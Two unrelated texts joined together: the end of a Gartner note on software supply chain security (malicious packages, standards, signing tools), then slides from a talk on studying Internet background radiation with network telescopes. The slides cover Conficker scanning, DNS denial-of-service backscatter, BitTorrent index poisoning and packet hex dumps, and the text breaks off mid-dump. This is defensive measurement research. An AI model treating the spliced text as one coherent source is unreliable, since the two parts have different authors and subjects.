their focus “upstream,” bad actors can infect a single component, which will then be distributed
“downstream” using legitimate software workflows and update mechanisms.”
ReversingLabs revealed over 700 malicious gems (packages written in Ruby programming
language) being distributed through the RubyGems repository. Twelve Python libraries uploaded
on the official Python Package Index (PyPI) contained malicious code. In Jan 2021, Sonatype
discovered three malicious packages that were published to npm repository, all of which
leveraged brandjacking and typosquatting techniques.
Note 6: Frameworks and Standards for Evaluating Supply Chain
Security
Evaluating Your Supply Chain Security — a Checklist by Cloud Native Computing Foundation
(CNCF)
NIST Secure Software Development Framework
NIST, Security and Privacy Controls for Information Systems and Organizations
Deterministic builds: A given source must always yield the same output.
■
Hardened build tools: The tools in the build pipeline are hardened and immutable.
■
■ Verifiable output: Ability to detect and fix the discrepancy between expected and actual builds.
Ul 2900 for IoT Certification
ISO/IEC 27034
Note 7: Sample Hashing and Signing Tools
Visual Studio — Hashing Source Code Files with Visual Studio to Assure File Integrity
GaraSign For Code Signing
© 2022 Gartner, Inc. and/or its Affiliates. All Rights Reserved.
© 2022 Gartner, Inc. and/or its affiliates. All rights reserved. Gartner is a registered trademark of Gartner, Inc.
and its affiliates. This publication may not be reproduced or distributed in any form without Gartner's prior
written permission. It consists of the opinions of Gartner's research organization, which should not be
construed as statements of fact. While the information contained in this publication has been obtained from
sources believed to be reliable, Gartner disclaims all warranties as to the accuracy, completeness or adequacy
of such information. Although Gartner research may address legal and financial issues, Gartner does not
provide legal or investment advice and its research should not be construed or used as such. Your access and
use of this publication are governed by Gartner’s Usage Policy. Gartner prides itself on its reputation for
independence and objectivity. Its research is produced independently by its research organization without input
or influence from any third party. For further information, see "Guiding Principles on Independence and
Objectivity."
About
Careers
Newsroom
Policies
Site Index
IT Glossary
Gartner Blog Network
Contact
Send
Feedback | pdf |
Examining the
Internet’s Pollution!
Karyn Benson!
[email protected]!
2
https://www.reddit.com/r/AskReddit/comments/2pjsf9/garbage_men_of_reddit_whats_the_most_illegal/
3
http://www.owensworld.com/funny-pictures/vehicles/2-cars-dumpster
People throw out interesting and valuable items
4
This talk: what sort of interesting and valuable
information can we find in the Internet’s “trash?”
5
About me
• I studied Internet “trash” for the last 4 years of my PhD
• Before grad school: wrote intrusion detection software
6
Outline
• What is Internet “trash?”
• How can we collect “trash?”
• Data for this presentation
• Interesting and valuable items found in “trash”
• Conclusion
7
What is Internet “trash?”
• Unsolicited packets
• Passively captured
• Also called Internet Background Radiation (IBR)
8
Traffic: Scanning
• Searching for hosts that run a service
9
• Host responds to forged packets
7.7.7.7
Traffic: Backscatter
Victim
Attacker
1.2.3.4
3.3.3.3
From: 1.2.3.4
To: 3.3.3.3
SYN
10
• Host responds to forged packets
7.7.7.7
Traffic: Backscatter
Victim
Attacker
1.2.3.4
3.3.3.3
From: 3.3.3.3
To: 1.2.3.4
SYN-ACK
11
Traffic: Misconfiguration
• Host erroneously believes that a machine is hosting
a service
DNS Servers:
5.5.5.5
6.6.6.6
1.2.3.4 X
12
Traffic: Bugs
DNS Servers:
4.3.2.1
1.2.3.4
• Software errors cause packets to reach unintended
destinations
To: 1.2.3.4
DNS Query
13
Traffic: Spoofed
• Hosts forge their IP address to make it appear as though it originates from a
different source
3.3.3.3
1.2.3.4
From: 2.2.2.2
To: 1.2.3.4
SYN
14
Traffic: Unknown
• Traffic produced for an unknown purpose
• TCP SYN to non-standard port
• Encrypted UDP packets
• UDP with unknown payload
6:00:06.000065 IP 111.248.55.49.51956 > 1.16.56.246.7605: UDP, length 19
0x0000: 4500 002f 6c48 0000 7011 ---- 6ff8 3731 E../lH..p..Fo.71
0x0010: 0110 38f6 caf4 1db5 001b 8298 7133 0f00 ,.8.........q3..
0x0020: 643e c2d4 2cf5 42b5 810f 7f01 5344 1e d>..,.B.....SD.
15
How can we collect “trash?”
16
How to collect unsolicited traffic
• Honeypots: Setting up machines that are purposefully infected with malware
1.0.0.0
17
Destination
Rule
Any without response
Write packet to storage
How to collect unsolicited traffic
• One-way traffic: Record any packet without a response
1.0.0.0
1.0.0.4
1.0.0.33
1.0.0.97
1.0.0.133 1.0.0.208
BGP:
1.0.0.0/24
18
How to collect unsolicited traffic
• Greynet: Record traffic destined to any unused IP address
1.0.0.0
1.0.0.4
1.0.0.33
1.0.0.97
1.0.0.133 1.0.0.208
BGP:
1.0.0.0/24
Destination
Rule
1.0.0.[0,4,33,97,133, 208]
Route to destination
All others in 1.0.0.0/24
Write packet to storage
19
How to collect unsolicited traffic
• Covering prefix: Record any packet destined to an unused subnet
1.0.0.1
1.0.0.9
1.0.0.17
1.0.0.31
1.0.0.63 1.0.0.127
Destination
Rule
1.0.0.0/25
Route to destination
1.0.0.128/25
Write packet to storage
BGP
1.0.0.0/24
20
How to collect unsolicited traffic
• Network telescope: Announce unused addresses and record all traffic
BGP:
1.0.0.0/24
Destination
Rule
1.0.0.0/24
Write packet to storage
21
We use network telescopes to easily study
macroscopic behaviors
Honeynet
One-way traffic
Greynet
Covering prefix
Network telescope
Ease of implementation
Fewer privacy concerns
Scalability
Lack of in-depth details
Avoidability
Honeynet
One-way traffic
Greynet
Covering prefix
Network telescope
Pros:
Cons:
22
Data used in this presentation
23
Our method of obtaining “trash”: Network
telescopes
• Multiple large (academic) network telescopes
• Currently capturing ~5TB compressed pcap per week
• Historical: traffic since 2008
Scanning,
misconfigured,
buggy or under
attack host
24
IBR is pervasive: We observe traffic from many
diverse sources
• Removed spoofed traffic. Method: [CCR ’13]
Total
~July 2013
Percent BGP
Announced
IP addresses
133M
5%
/24 blocks
3.15M
30%
Prefixes
205k
45%
ASes
24.2k
54%
Countries
233
99%
25
• Removed spoofed traffic. Method: [CCR ’13]
IBR is persistent: We observe a large number of
sources over time
Spamhaus Attack
26
Interesting and valuable items found in Internet
“trash”
27
Network telescopes capture a wealth of security-
related data
• Scanning: Trends and relation to vulnerability announcements
• Backscatter: Attacks on authoritative name servers
• Misconfigurations: BitTorrent index poisoning attacks
• Bugs: Byte order bug in security software
• Unknown: Encryption vs. obfuscation
28
Network telescopes capture a wealth of security-
related data
• Scanning: Trends and relation to vulnerability announcements
• Backscatter: Attacks on authoritative name servers
• Misconfigurations: BitTorrent index poisoning attacks
• Bugs: Byte order bug in security software
• Unknown: Encryption vs. obfuscation
29
Methodology
• Used Bro’s parameters: IP is considered a scanner if it sends:
• Packets to 25 different network telescope IP addresses
• Same protocol/port
• Within 5 minutes
• Results depend on size of network telescope
• Doesn’t capture super stealthy scanners (e.g., [Dainotti et al. IMC ’12])
30
Scanning: 2008-2012
• Conficker dominates
Packets
IPs
Conficker Outbreak
31
How do we know which packets originate from
Conficker?
• Bug in PRNG: primarily targets IP addresses {A.B.C.D | B <128 &
D < 128}
• Developed heuristic to identify sources randomly scanning with
this bug
Missing data
32
No Conficker
Expected
How do we know which packets originate from
Conficker?
• Bug in PRNG: primarily targets IP addresses {A.B.C.D | B <128 &
D < 128}
• Developed heuristic to identify sources randomly scanning with
this bug
Conficker discovered
33
How do we know which packets originate from
Conficker?
• Bug in PRNG: primarily targets IP addresses {A.B.C.D | B <128 &
D < 128}
• Developed heuristic to identify sources randomly scanning with
this bug
• Some evidence of a testing phase prior to discovery
No Conficker
Observed
Conficker discovered
First day: 2 IPs in"
Guangdong Province, China
34
Scanning Post 2012
• Conficker is dying out
• Port 23 (telnet) is popular
Packets
IPs
35
Scanning Post 2012
• Conficker is dying out
• Port 23 (telnet) is popular
Carna Botnet
Packets
IPs
http://internetcensus2012.bitbucket.org/paper.html
36
Scanning Post 2012: Scans of TCP/443 following
Heartbleed vulnerability announcement
37
Scanning Post 2012: Scans of TCP/5000 prior to
Akamai report of UPnP used for DDoS attacks
https://www.akamai.com/us/en/about/news/press/2014-press/akamai-warns-of-upnp-devices-used-in-ddos-attacks.jsp
38
Network telescopes capture a wealth of security-
related data
• Scanning: Trends and relation to vulnerability announcements
• Backscatter: Attacks on authoritative name servers
• Misconfigurations: BitTorrent index poisoning attacks
• Bugs: Byte order bug in security software
• Unknown: Encryption vs. obfuscation
39
Reference: https://www.nanog.org/sites/default/files/nanog63-dnstrack-vannice-ddos.pdf
Preventing access to websites via attacks on
authoritative name servers
1. DNS Query
Legitimate host
DNS server
Authoritative NS
3. Response to
Recursive DNS
Query
2. Recursive DNS
Query
4. DNS Response
Webserver
5. HTTP
GET
40
Why we see some of these attacks: open resolvers
From: 1.2.3.4
DNS Query
1.2.3.4
Spoofer 5.6.7.8
Open Resolver
Authoritative NS
41
Why we see some of these attacks: open resolvers
1.2.3.4
Spoofer 5.6.7.8
Open Resolver
Authoritative NS
Recursive DNS
Query
42
Why we see some of these attacks: open resolvers
1.2.3.4
Spoofer 5.6.7.8
Open Resolver
Authoritative NS
Response to
Recursive DNS
Query
43
To: 1.2.3.4
DNS Response
Why we see some of these attacks: open resolvers
1.2.3.4
Spoofer 5.6.7.8
Open Resolver
Authoritative NS
44
We infer more open resolvers as a result of an
increase in DNS traffic
Very few open resolvers
before Jan 29, 2014
Same open
resolvers used
IPs
IBR
~July 2013
3.4k
IBR
~Feb. 2014
1.56M
45
But the number of open resolvers we see is much
less than active probing
Very few open resolvers
before Jan 29, 2014
Same open
resolvers used
IPs
IBR
~July 2013
3.4k
IBR
~Feb. 2014
1.56M
Open
Resolver
Project
~Feb. 2014
37.6M
46
The open resolvers we observe are used in DoS
attacks... and it’s working
IPs
OPCODE:
OK
OPCODE:
SERVFAIL
IBR
~July 2013
3.4k
3.0k
148
IBR
~Feb. 2014
1.56M
1.44M
1.45M
Open
Resolver
Project
~Feb. 2014
37.6M
32.6M
0.92M
Problem with the
(authoritative) NS
High number of
errors
Low number of
errors
47
Queried domains
• First day: queries for baidu.com --- likely testing phase
• Data from first month of activity. We still observe the attack.
020sf.com 024web.net 027dz.com 028xkj.com 029sms.com 02gd.com 0319pk.com 03lcq.com 052000.com 0538hj.com 0571video.com 059sem.com
0769cg.com 0769ff.com 08ws.com 111da.com 1188008.com 1234176.com 139hg.com 167uc.com 16888china.com 173pk.com 176cc.com 176dd.com
176gj.com 176kw.com 176l.com 176mm.com 176xq.com 17c.cc 180xp.com 184sf.com 185jxcq.com 191cq.com 19jy.com 201314baidu.com 202aaa.com
236899.com 24ribi.com 250hj.com 266mi.com 269sf.com 2kkx.com 3000sy.com 300eeee.com 300llll.com 300ssss.com 303aaa.com 303bbb.com 30gg.com
316ms.com 321xy.com 360362.com 365ddos.cn 369df.com 38db.com 38za.com 3gabn.com 3kkx.com 3q518.com 3t33.com 4000123046.com 40cqcq.com
442ko.com 4z1s.info 500sf.com 512312.com 513wt.com 515kkk.com 51aidi.com 51rebeng.com 51yjzs.com 520898.com 520sfyx.com 525mk.com 52ccx.com
52ssff.com 531gou.com 555fz.com 567uu.com 56bj56.com 5ipop.net 5kkx.com 600dddd.com 60sf.com 616162.com 63fy.com 666hf.com 68yb.com 6ee.com
6g5b.info 6kkx.com 6ksf.com 700rrrr.com 72play.com 72sm.com 74486.com 76489.com 766mi.com 767hh.com 76wzw.com 76yxw.com 775gg.com
778ff.com 787ok.com 799mi.com 7afa.com 7s7ss.com 800liao.net 800nnnn.com 800oooo.com 800uuuu.com 815quan.com 81hn.com 81ypf.com 82hf.com
83uc.cn 83wy.com 84822258.com 85191.com 87145.com 87xn.com 885jj.com 886pk.com 8885ok.com 900eeee.com 909kkk.com 910pk.com 911aiai.com
911gan.com 911ii.com 911mimi.com 911sepian.com 911xi.com 911xu.com 911yinyin.com 915hao.com 919uc.com 926.com 92xiaobao.com 933fg.com
940945.net 97pc.net 980311.net 981118.com 98989833.com 991816.com 998.co 999qp.net 99hcq.com 99ktw.com 99mzi.com 99ting.com 99wf.com
9aq.com 9kanwo.com 9kf.com 9zny.com a6c5.com akadns.net aliyuncs.com amdxy.com appledaily.com.hk appledaily.com.tw arx888.com asxkmy.com
atnext.com aws520.com b166.com badong123.com bbidda.com bbjck.com bbs117.com bdaudi.com bdhope.com betboy.cc betboy.hk betboy.tw
bettykid.com bjts168.com boeeo.com booooook.com bw176.com byfire.net cc176.com cck168.com ccskys.com cd519.com cdhydq.com cdjbg.com
cdxgy.com cg1314.com cgxin.com chinahjfu.com chuansf-1.com chuansf.com ck1997.com clntwr.com cm0556.com cn191.com cn948.com comedc.com
cp375.com cq520.com cqqhjgj.com cs912.com ct0553.com ct176.com ctysy.com cxmyy.com dama2.com daqinyy.com disshow.com dmmjj.com dnsabc.com
dt176.com dudu176.com dw173.com dytt8.net e0993.com e5e566.com edgesuite.net faahaa.com fen-sen.com fg9999.com fjhzw.com fu180.com furen88.net
fw10000.com fzl4.com gbdzd.com gegegan1.com gegequ.com go176.com gotocdn.com guangyuchina.com gx911.com h5acg.com had1314.com
hao9458.com haocq99.com haosf3165.com haosf86.net hcemba.com hcq180.com hcq99.com hcqmir.com he09.com heblq.com henhenlu.com hf600.cn
hi0762.com hi182.com hj19.com hj321.com hkdns-vip.com hl176.com hlm53.com hn179.com hnart123.com hndc114.com hqsy120.com hscmis.com
htbdcn.com huaxia76.com hw166.com hyh588.com hz96.com icheren.net iidns.com iinfobook.net jc0633.com jccjk.com jd176.com jdgaj.com jdlcq.com
jdyyw.com jeeweb.net jf086.com jh219.com jiaduolu.net jiayun588.com jn176.com jrj001.com jshgl.com jt1216.com jx116.com jx8111.com k9080.com
kd5888.com kp811.com kr5b.com kx2014.com laocq.com laocq180.com laosf180.com laowz176.com laoyou999.com lcjba.com lcq170.com liehoo.net
like400.com lmh176.com love303.com lpp176.com lsr176.com luse0.com luse1.com luse2.com luse3.com luse4.com luse5.com luse6.com luse7.com
luse8.com luse9.com lwfb800.com lxt998.com lygfp.com lyxyqp.com lz9999.com m2bd.pw m3088tv.com manyefs.com mir108.com mir1860.com mir86.com
miryy.com mly555.com mm5ii.com ncmir.com net0335.com nextmedia.com nnlrw.com onaccr-cn.com p0757.com pao176.com ph268.com pk8558.com
pksf08.com puhup.com purednsd.com purevm.com px518.com q1.com qfqcc.com qhdflkmc.com qianliri.com qingfeng180.com quanben.com qy176.com
rp1704.com rq180.com s6s5.com salangane-books.com scktsj.com sdcsnk.com sdjlh.com seluoluo2.com seluoluo3.com seoeee.com sf117.com sf123.com
sf665.com sf717.com sg500.com sh1099.com sheshows.com sinaapp.com skcq.net sl139.com sp176.com ssthjy.com sytcqy.com szchscm.com
tangdefenghuang.com tg180.com tianmao76.com tjldktv.com txj880.com tz176.com vip78.cn w78z.com w8best.com wan26.com wancantao.net
wanfuyou.com wb123.com wfbaby.net wn176.com wotebang.com wsn88.com wy176.com wyb.name wysss.com wz.com x5wb.com x7car.com x7ok.com
xhzssj.com xia00.com xiaolongcq.com xiaoyx123.com xie139.com xin2003.com xjliuxue.cn xtj123.com xx2pp.com xxxoooo.com xxyl100.com yeyelu0.com
yeyelu9.com yg521.com yh996.com yifeng2012.com yinquanxuan.com youcai667.com ysbxw.com yshqq.com ysmir.cn ytwtoys.com ytz4.info
yuhuakonggu.com yw110.com yw119.com yx5881.com yy188.com yy698.com yzrjy.com yzypp.com zbtlw.com zc911.com zgtx168.com zhao106.com
zhaoil.com zhaoqjs.com zhizunfugu.com zinearts.com zongzi0898.com zst0510.com zuyu1.com zxj02.com zxw198.com 052000.com 422.ko.com 51pop.net
5rxe.info 999.net.ru baidu.com bb0575.com gb41.com geigan.org lhy716.com sz-xldrhy.com wgduznyw.ga wo135.com. zbtlw.com. zgvqtnrc.ga
Example Registration Info:
Domain Name:029sms.com
...
Updated Date:2014-02-14 14:55:38
Creation Date:2014-02-14 14:55:38
...
Registrant
Street:hkjhkjhjkhjkRegistrant
City:Beijing ShiRegistrant State/
Province:Beijing ShiRegistrant Postal
Code:333333Registrant
Country:ChinaRegistrant Phone:
11111111Registrant Phone
Ext:Registrant Fax:11111111
48
Network telescopes capture a wealth of security-
related data
• Scanning: Trends and relation to vulnerability announcements
• Backscatter: Attacks on authoritative name servers
• Misconfigurations: BitTorrent index poisoning attacks
• Bugs: Byte order bug in security software
• Unknown: Encryption vs. obfuscation
49
BitTorrent index poisoning attacks induce many
hosts to send IBR
BITTORRENT DHT
!
To: DHT
Where can I get
a torrent?
• Index poisoning: purposefully inserting fake
information into the DHT
50
BitTorrent index poisoning attacks induce many
hosts to send IBR
BITTORRENT DHT
!
Torrent Location:
1.2.3.4
• Index poisoning: purposefully inserting fake
information into the DHT
51
Popular Torrents in IBR - July 2012
hash
Torrent
Packets
48484fab5754055fc530fcb5de556
4651c4ef28f"
Grand Theft Auto - Chinatown Wars
450k
5b5e1ffa9390fff13f4af2aef9f58
61c4fbf46eb"
Modern Family S3E22
398k
d90c1110a5812d9a4bf3c28e27
9653a5c4f78dd1"
CSI S12E22
204k
2ecce214e48feca39e32bb50df
cf8151c1b166cc"
Coldplay Ft. Rhianna Princess of China
187k
79f771ec436f09982fc345015fa
1c1d0d8c38b48"
???
129k
b9be9fc1db584145407422b09
07d6a09b734a206"
Parks and Recreation S4E22
127k
99a837efde41d35c283e2d9d7
e0a1d4a7cd996dd"
Missing 2012 S1E9
106k
7b05b6b6db6c66e7bb8fa5aa7
0a185c7cfcd3d07"
???
104k
c0841cf3196a83d1d08ae4a9e
af10fcfc6c7ba66"
Big Trouble Little China
99k
99dfae74641d0ca29ef5238607
13a6270daefc6e"
36 China Town
91k
52
Popular Torrents in IBR - July 2013
hash
Torrent
Packets
f7eb38b830ec749f43cf3df20dbc2
bf2c99fad97"
Sette Anni in Tibet
2,356k
6ec64cb88937418d6af29fca6d
017e0c658654b7"
高清光720P版BD-RMVB.中字
912k
f90cb027174c2af3c5b838be09
a62ff16d6c2ef5"
美生灵 TC英中字.rmvb
845k
fedcf797109c7929558d069602
ac6fab0b46e814"
Halo 4 Until Dawn
735k
3b508d09e9c4677b2f67683a9
dde2d5ce0b2aa24"
soh 360
580k
1254bb23d1a04447cb67bc047
9549a504d083c31"
Her Sweet Hand China Lost Treasure
539k
48484fab5754055fc530fcb5de
5564651c4ef28f"
Grand Theft Auto - Chinatown Wars
489k
b9be9fc1db584145407422b09
07d6a09b734a206"
Parks and Rec S4E22
482k
93efed3aa07e7523d5c4e42f02
57f9aa8d5011c3"
Dajiyun
431k
039a07b38de4529c477f3b756
98937e9c5d4acd6"
ntdvt news
325k
53
BitTorrent: Temporal aspect
• Unclear why fewer /24 blocks are observed
• But pausing attack is a possible explanation
/24 BLOCKS (FROM BT) PER Hour
2012
54
BitTorrent: Spatial aspect
• /24 blocks sending BitTorrent KRPC packets are more likely to be observed by
certain destination IPs and ports
• get_peers and find_node packets: certain IP addresses more
likely to be targeted : {X.B.C.D| B & 0x88 = 0x00 and D & 0x09 = 0x01}
• A bug in PRNG for generating IP addresses is a plausible explanation
55
July 2015: Huge increase in BitTorrent traffic
• Graph: BitTorrent KRPC packets
• Increase is caused by traffic destined to 1 IP => traffic from over 3.7M /24s
per month
• Still going on... not sure of all the details yet
56
Investigating July 2015 increase in BitTorrent IBR
• Installed two BitTorrent clients on one machine (uTorrent,
Deluged)
• Just joined DHT didn’t download any torrents
• ~2.5 months: Nov. 15 2015 - Jan. 28 2016
• uTorrent: 12 IPs sent 112 packets to a network telescope IP
• Deluged: 51 IPs send 64 packets to a network telescope IP
• Who directed us to network telescope?
• LibTorrent most popular client, but not used exclusively
• China most popular geolocation, but not exclusively
57
Suspicious BitTorrent behavior
• Most IDs associated with network telescope IP have their
third byte equal to 0x04
• Other IP address in response packets occur frequently and
have third-byte quirks
Sample node IDs
b8:1d:04:ef:96:18:e4:20:6b:c2:8d:1a:31:af:de:7a:81:66:02:56
bd:23:04:04:e9:5e:f5:a0:10:08:06:95:a3:ab:93:c7:74:f5:a6:58
52:b1:04:09:49:b4:91:f8:38:e6:c5:06:38:8d:04:8a:50:99:3f:50
05:b5:04:7e:6a:b8:96:1a:35:07:4e:ae:3e:d3:41:21:95:45:a8:81
13:28:04:d6:d3:2d:db:c5:07:79:7e:14:27:09:e1:37:e7:7e:25:2f
13:28:04:a9:5c:2d:82:2f:78:65:54:13:04:6d:b4:10:72:57:8d:5d
Other IP
Packets
3rd byte
157.144.153.163
76 from 6 IPs
0x05
177.123.230.26
55 from 7 IPs
0x00
212.246.161.63
64 from 7 IPs
0x06
217.123.247.72
87 from 4 IPs
0x03
27.171.198.228
55 from 8 IPs
0x07
90.122.90.178
4 from 3 IPs
0x01
58
Network telescopes capture a wealth of security-
related data
• Scanning: Trends and relation to vulnerability announcements
• Backscatter: Attacks on authoritative name servers
• Misconfigurations: BitTorrent index poisoning attacks
• Bugs: Byte order bug in security software
• Unknown: Encryption vs. obfuscation
59
How many sources send us unsolicited traffic?
Conficker
Outbreak
BitTorrent
????
Source IPs per hour
0.0M
1.0M
2.0M
3.0M
4.0M
5.0M
6.0M
7.0M
Jan
2008
Jan
2009
Jan
2010
Jan
2011
Jan
2012
Jan
2013
Jan
2014
Jan
2015
60
Responsible payload
6:00:00.083796 IP 123.4.253.107.8090 > 1.179.58.115.42501: UDP, LENGTH 30
0X0000: 4500 003A DF4B 0000 2E11 ---- 7B04 FD6B E..:.K......{..K
0X0010: 01B3 3A73 1F9A A605 0026 C0CF 0000 0000 ..:S.....&......
0X0020: 0000 0000 3100 3D57 0000 0000 0000 0000 ....1.=W........
0X0030: 0000 0000 287E 02C7 0000
Fixed
Connection ID
Random
Counter
• 8090 is most popular source port
• 39455 is most popular destination port
61
Lots of hosts from China
IPs
% BGP Announced
Address Space
China
101M
36.26%
Taiwan
505k
1.45%
Malaysia
442k
7.65%
USA
324k
0.03%
Hong Kong
280k
2.75%
Japan
186k
0.11%
Canada
129k
0.26%
Thailand
126k
1.55%
Australia
126k
0.31%
Singapore
116k
2.16%
• August 2013 data
4 IPs belonging to CS department!
62
Monitoring CS department address space
• Capture 1: 36 hours of traffic in/out of CS department for this
packet
• CS address space also receives packets
• 3 of 4 IPs from CS observed generating this traffic
• Capture 2: Monitor all traffic to/from these IPs on associated UDP
ports
63
Monitoring CS machines
• Packet 1: CS machines
contact a common IP address:
tr-b.p.360.cn
• Packet 2: CS machines
receive a large packet
04:40:45.211649 IP 180.153.227.168.80 > 2.239.95.102.10102: UDP, length 1044
0x0000: 4500 0430 0100 0000 ed11 ---- b499 e3a8 E..0......L%....
0x0010: 02ef 5f66 0050 2776 041c b5bd 0414 0350 .._f.P'v.......P
0x0020: 2c00 0000 e469 18ad ab70 9e6c dad1 d5fe ,....i...p.l....
0x0030: c1c5 d3f7 e0cc 674d 0000 3200 0001 11d9 ......gM..2.....
0x0040: 0001 07ad 0000 0000 3538 3033 4443 3244 ........5803DC2D
0x0050: 4233 3937 3cf6 1925 1f9a 0044 3146 3443 B397<..%...D1F4C
0x0060: 3732 4334 3039 4232 7756 e0df 1f9a 0044 72C409B2wV.....D
0x0070: 3232 3134 4445 4133 4643 3138 dde8 a6ed 2214DEA3FC18....
0x0080: 6784 0044 3846 3731 4437 4342 3346 3833 g..D8F71D7CB3F83
0x0090: 7146 287a 153d 0144 3131 4545 3334 4443 qF(z.=.D11EE34DC
0x00a0: 4342 3035 718f 4da1 9d41 0144 4239 3631 CB05q.M..A.DB961
0x00b0: 3139 3441 4334 3645 73d7 4fdc 197a 0144 194AC46Es.O..z.D
0x00c0: 3131 3537 3736 3334 3946 4343 da17 0f23 115776349FCC...#
0x00d0: 2711 0144 4345 4539 3242 3938 3131 4639 '..DCEE92B9811F9
0x00e0: b6f7 838b 2774 0144 4146 3546 4639 3333 ....'t.DAF5FF933
0x00f0: 4346 4541 b721 5ba8 2711 0144 3039 3738 CFEA.![.'..D0978
0x0100: 3030 4536 4643 4144 b622 bcb9 ace8 0144 00E6FCAD.".....D
0x0110: 3346 3935 3030 3736 3836 4342 7177 6c38 3F95007686CBqwl8
0x0120: 9e52 0144 3946 3844 3139 3230 3941 4436 .R.D9F8D19209AD6
0x0130: af0c 97d4 0845 0144 3545 4533 3335 4544 .....E.D5EE335ED
0x0140: 4642 4431 1b12 880f 1f9a 0044 3831 4230 FBD1.......D81B0
0x0150: 3542 3634 4441 4333 7075 6774 1f9a 0044 5B64DAC3pugt...D
0x0160: 3643 3146 4535 3832 3033 3330 deb4 5486 6C1FE5820330..T.
0x0170: 271c 0144 4234 4333 3130 4130 3243 3039 '..DB4C310A02C09
0x0180: 6a78 7c09 4f7b 0144 3130 3134 3044 3239 jx|.O{.D10140D29
0x0190: 4537 3234 b623 c1cc 157a 0144 4434 4430 E724.#...z.DD4D0
0x01a0: 3736 3634 4637 3042 0154 cc65 5c7e 0144 7664F70B.T.e\~.D
0x01b0: 4535 4137 3030 4330 3536 4137 6eb5 cd70 E5A700C056A7n..p
0x01c0: 2777 0144 4337 3037 3636 4233 3631 3338 'w.DC70766B36138
0x01d0: 71f9 2724 1f9a 0044 3832 3031 3232 3039 q.'$...D82012209
0x01e0: 3836 3431 dca2 f7ac 1f9a 0044 3941 4244 8641.......D9ABD
0x01f0: 4434 4437 3631 3742 2a5c 039e 0eca 0144 D4D7617B*\.....D
0x0200: 3137 3541 3834 4634 3844 3438 01cd 7bef 175A84F48D48..{.
0x0210: 3b1a 0144 4130 3638 3042 3830 3335 3538 ;..DA0680B803558
0x0220:
ab53 1c9e ad82 0144 3841 3043 3430 3939
S
D8A0C4099
63
64
04:40:45.211649 IP 180.153.227.168.80 > 2.239.95.102.10102: UDP, length 1044
0x0000: 4500 0430 0100 0000 ed11 ---- b499 e3a8 E..0......L%....
0x0010: 02ef 5f66 0050 2776 041c b5bd 0414 0350 .._f.P'v.......P
0x0020: 2c00 0000 e469 18ad ab70 9e6c dad1 d5fe ,....i...p.l....
0x0030: c1c5 d3f7 e0cc 674d 0000 3200 0001 11d9 ......gM..2.....
0x0040: 0001 07ad 0000 0000 3538 3033 4443 3244 ........5803DC2D
0x0050: 4233 3937 3cf6 1925 1f9a 0044 3146 3443 B397<..%...D1F4C
0x0060: 3732 4334 3039 4232 7756 e0df 1f9a 0044 72C409B2wV.....D
0x0070: 3232 3134 4445 4133 4643 3138 dde8 a6ed 2214DEA3FC18....
0x0080: 6784 0044 3846 3731 4437 4342 3346 3833 g..D8F71D7CB3F83
0x0090: 7146 287a 153d 0144 3131 4545 3334 4443 qF(z.=.D11EE34DC
0x00a0: 4342 3035 718f 4da1 9d41 0144 4239 3631 CB05q.M..A.DB961
0x00b0: 3139 3441 4334 3645 73d7 4fdc 197a 0144 194AC46Es.O..z.D
0x00c0: 3131 3537 3736 3334 3946 4343 da17 0f23 115776349FCC...#
0x00d0: 2711 0144 4345 4539 3242 3938 3131 4639 '..DCEE92B9811F9
0x00e0: b6f7 838b 2774 0144 4146 3546 4639 3333 ....'t.DAF5FF933
0x00f0: 4346 4541 b721 5ba8 2711 0144 3039 3738 CFEA.![.'..D0978
0x0100: 3030 4536 4643 4144 b622 bcb9 ace8 0144 00E6FCAD.".....D
0x0110: 3346 3935 3030 3736 3836 4342 7177 6c38 3F95007686CBqwl8
0x0120: 9e52 0144 3946 3844 3139 3230 3941 4436 .R.D9F8D19209AD6
0x0130: af0c 97d4 0845 0144 3545 4533 3335 4544 .....E.D5EE335ED
0x0140: 4642 4431 1b12 880f 1f9a 0044 3831 4230 FBD1.......D81B0
0x0150: 3542 3634 4441 4333 7075 6774 1f9a 0044 5B64DAC3pugt...D
0x0160: 3643 3146 4535 3832 3033 3330 deb4 5486 6C1FE5820330..T.
0x0170: 271c 0144 4234 4333 3130 4130 3243 3039 '..DB4C310A02C09
0x0180: 6a78 7c09 4f7b 0144 3130 3134 3044 3239 jx|.O{.D10140D29
0x0190: 4537 3234 b623 c1cc 157a 0144 4434 4430 E724.#...z.DD4D0
0x01a0: 3736 3634 4637 3042 0154 cc65 5c7e 0144 7664F70B.T.e\~.D
0x01b0: 4535 4137 3030 4330 3536 4137 6eb5 cd70 E5A700C056A7n..p
0x01c0: 2777 0144 4337 3037 3636 4233 3631 3338 'w.DC70766B36138
0x01d0: 71f9 2724 1f9a 0044 3832 3031 3232 3039 q.'$...D82012209
0x01e0: 3836 3431 dca2 f7ac 1f9a 0044 3941 4244 8641.......D9ABD
0x01f0: 4434 4437 3631 3742 2a5c 039e 0eca 0144 D4D7617B*\.....D
0x0200: 3137 3541 3834 4634 3844 3438 01cd 7bef 175A84F48D48..{.
0x0210: 3b1a 0144 4130 3638 3042 3830 3335 3538 ;..DA0680B803558
0x0220:
ab53 1c9e ad82 0144 3841 3043 3430 3939
S
D8A0C4099
Monitoring CS machines
• Packet 3-40: CS machines
contact sources encoded in
packet
04:40:45.215588 IP 2.239.95.102.10102 > 113.70.40.122.5437: UDP, length 72
0x0000: 4500 0064 536f 0000 3f11 ---- 02ef 5f66 E..dSo..?....._f
0x0010: 7146 287a 2776 153d 0050 1bff 0000 0000 qF(z'v.=.P......
0x0020: f21e 9a42 4103 55e1 0000 0004 0000 0000 ...BA.U.........
0x0030: 0038 0000 0001 0000 0000 0028 e469 18ad .8.........(.i..
0x0040: ab70 9e6c dad1 d5fe c1c5 d3f7 e0cc 674d .p.l..........gM
0x0050: 3336 3050 3030 3638 3531 4534 4230 4442 360P006851E4B0DB
0x0060: 3433 3044 430D
64
65
• More packets are exchanged...
• and sometimes there is a byte order bug!
• So 1.2.3.4 receives packets when intended recipient has IP address 4.3.2.1
04:40:46.878016 IP 2.239.95.102.10102 > 122.40.70.113.15637: UDP, length 30
0x0000: 4500 003a 552d 0000 3f11 ---- 02ef 5f66 E..:U-..?....._f
0x0010: 7a28 4671 2776 3d15 0026 2c6b 0000 0000 z(Fq'v=..&,k....
0x0020: 0000 0000 3100 55e1 0000 0000 0000 0000 ....1.U.........
0x0030: 0000 0000 42d6 0005 0000 ....B.....
Monitoring CS machines
04:40:46.877858 IP 113.70.40.122.5437 > 2.239.95.102.10102: UDP, length 30
0x0000: 4500 003a 6213 0000 2f11 ---- 7146 287a E..:b.../...qF(z
